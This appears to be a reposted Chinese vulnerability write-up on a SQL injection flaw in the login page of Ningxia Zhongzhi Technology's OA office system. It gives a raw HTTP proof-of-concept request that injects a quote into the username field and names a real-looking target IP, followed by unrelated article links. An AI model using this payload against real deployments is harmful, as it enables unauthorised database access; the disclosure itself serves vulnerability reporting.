当前位置: 首页 > news >正文

宁夏众智科技OA办公系统存在SQL注入漏洞

news 2025/7/24 4:35:42

漏洞描述

宁夏众智科技OA办公系统存在SQL注入漏洞

漏洞复现

POC

POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
Host: 
Content-Length: 45
Cache-Control: max-age=0
Origin: http://39.105.48.206
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.105.48.206/Account/Login?ACT=Index&CLR=Home
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-aliveusername=admin%27&password=1&RememberMe=false

bp报错500

sqlmap确认漏洞

http://www.lryc.cn/news/451343.html

相关文章:

  • Spring邮件发送:配置与发送邮件详细步骤?
  • iPhone/iPad技巧:如何解锁锁定的 iPhone 或 iPad
  • 无源码实现免登录功能
  • 大数据毕业设计选题推荐-民族服饰数据分析系统-Python数据可视化-Hive-Hadoop-Spark
  • 疾风大模型气象,基于气象数据打造可视化平台
  • PHP安装后Apache无法运行的问题
  • [论文精读]Multi-Channel Graph Neural Network for Entity Alignment
  • Study-Oracle-10-ORALCE19C-RAC集群搭建(一)
  • 1.8 物理层下的传输媒体
  • 指纹定位的原理与应用场景
  • 发现一款适合所有用户小巧且强大的编辑器(完美替换Windows记事本)
  • Mysql知识点整理
  • ISA-95制造业中企业和控制系统的集成的国际标准-(4)
  • Redis篇(Redis原理 - 数据结构)(持续更新迭代)
  • Disco公司的DBG工艺详解
  • 大学学校用电安全远程监测预警系统
  • C++网络编程之IP地址和端口
  • 陶瓷4D打印有挑战,水凝胶助力新突破,复杂结构轻松造
  • 网络安全的详细学习顺序
  • 人工智能与机器学习原理精解【28】
  • StarRocks 中如何做到查询超时(QueryTimeout)
  • Windows 开发工具使用技巧 Visual Studio使用安装和使用技巧 Visual Studio 快捷键
  • 计算机网络-系分(5)
  • React Native使用高德地图
  • 排序算法的理解
  • Yocto - 使用Yocto开发嵌入式Linux系统_04 使用Toaster来创建一个image
  • 【C#生态园】后端服务与网络库:选择适合你游戏开发的利器
  • 计算机前沿技术-人工智能算法-大语言模型-最新研究进展-2024-09-30
  • 【漏洞复现】JeecgBoot 积木报表 queryFieldBySql sql注入漏洞
  • Qt6 中相对于 Qt5 的新增特性及亮点